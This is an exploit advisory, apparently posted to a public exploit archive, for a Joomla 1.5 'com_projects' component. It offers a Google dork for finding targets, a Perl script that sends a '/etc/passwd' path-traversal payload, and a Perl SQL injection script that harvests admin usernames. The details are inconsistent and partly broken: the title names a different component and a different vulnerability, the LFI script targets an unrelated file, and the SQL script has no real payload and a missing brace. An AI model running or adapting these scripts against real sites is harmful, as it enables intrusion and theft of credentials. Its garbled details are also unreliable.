Joomla Component com_projects LFI & SQL Vulnerability

=========================================================

Joomla  Component com_projects LFI & SQL Vulnerability

=========================================================



[+]Title        : Joomla  Component com_calendrier RFI Vulnerability

[+]Author       : jos_ali_joe

[+]Contact      : josalijoe@yahoo.com

[+]Home 	: http://josalijoe.wordpress.com/		





######################################################################## 



Dork		: inurl:index.php?option="com_projects"



######################################################################## 



[ Software Information ]



########################################################################

[+] Vendor : http://www.codegravity.com/

[+] Download : http://www.joomla.org/download.html

[+] version : Joomla 1.5

[+] Vulnerability : LFI and SQL Vulnerability

[+] Dork : com_projects

########################################################################



[+] Exploit: LFI



====================================================================================

http://localhost/index.php?option=com_projects&controller=[ LFI ]

====================================================================================

use LWP::UserAgent;

use HTTP::Request;

use LWP::Simple;



print "\t\t########################################################\n\n";

print "\t\t#    Joomla  Component com_projects LFI Vulnerability  #\n\n";

print "\t\t#                        by jos_ali_joe                #\n\n";

print "\t\t########################################################\n\n";





if (!$ARGV[0])

{

print "Usage: perl idc.pl [HOST]\n";

print "Example: perl idc.pl http://localhost/LFI/\n";;

}



else

{



$web=$ARGV[0];

chomp $web;



$iny="agregar_info.php?tabla=../../../../../../../../../../../../../../../../etc/passwd%00";



my $web1=$web.$iny;

print "$web1\n\n";

my $ua = LWP::UserAgent->new;

my $req=HTTP::Request->new(GET=>$web1);

$doc = $ua->request($req)->as_string;



if ($doc=~ /^root/moxis ){

print "Web is vuln\n";

}

else

{

print "Web is not vuln\n";

}



}



####################################################################################



[+] Exploit: SQL



====================================================================================

http://localhost/index.php?option=com_projects&view=project&id=[ SQL ]

====================================================================================



use IO::Socket;

if(@ARGV < 1){

print "

[========================================================================

[//   Joomla Component com_projects SQL Injection Exploit

[//                   Usage: idc.pl [target]

[//                   Example: idc.pl localhost.com

[//                   Vuln&Exp : jos_ali_joe

[========================================================================

";

exit();

}

#Local variables

$server = $ARGV[0];

$server =~ s/(http:\/\/)//eg;

$host = "http://".$server;

$port = "80";

$file = "/index.php?option=com_projects&view=project&id=";

 

print "Script <DIR> : ";

$dir = <STDIN>;

chop ($dir);

 

if ($dir =~ /exit/){

print "-- Exploit Failed[You Are Exited] \n";

exit();

}

 

if ($dir =~ /\//){}

else {

print "-- Exploit Failed[No DIR] \n";

exit();

 }

 

 

$target = "SQL Injection Exploit";

$target = $host.$dir.$file.$target;

 

#Writing data to socket

print "+**********************************************************************+\n";

print "+ Trying to connect: $server\n";

$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";

print $socket "GET $target HTTP/1.1\n";

print $socket "Host: $server\n";

print $socket "Accept: * /*\n";

print $socket "Connection: close\n\n";

print "+ Connected!...\n";

#Getting

while($answer = <$socket>) {

if ($answer =~ /username:(.*?)pass/){

print "+ Exploit succeed! Getting admin information.\n";

print "+ ---------------- +\n";

print "+ Username: $1\n";

}



####################################################################################



Thanks :



./kaMtiEz &#150; ibl13Z &#150; Xrobot &#150; tukulesto &#150; R3m1ck &#150; jundab - asickboys- Vyc0d &#150; Yur4kha - XPanda - eL Farhatz



./ArRay &#150; akatsuchi &#150; K4pt3N &#150; Gameover &#150; antitos &#150; yuki &#150; pokeng &#150; ffadill - Alecs - v3n0m - RJ45



./Kiddies &#150; pL4nkt0n &#150; chaer newbie &#150; andriecom &#150; Abu_adam &#150; Petimati - hakz &#150; Virgi &#150; Anharku - a17z a.k.a maho





./Me Family ATeN4 :



./N4ck0 - Aury - TeRRenJr - Rafael - aphe-aphe 



Greets For :



./Devilzc0de crew &#150; Kebumen Cyber &#150; Explore Crew &#150; Indonesian Hacker - Byroe Net - Yogyacarderlink - Hacker Newbie - Jatim Crew - Malang Cyber



My Team : ./Indonesian Coder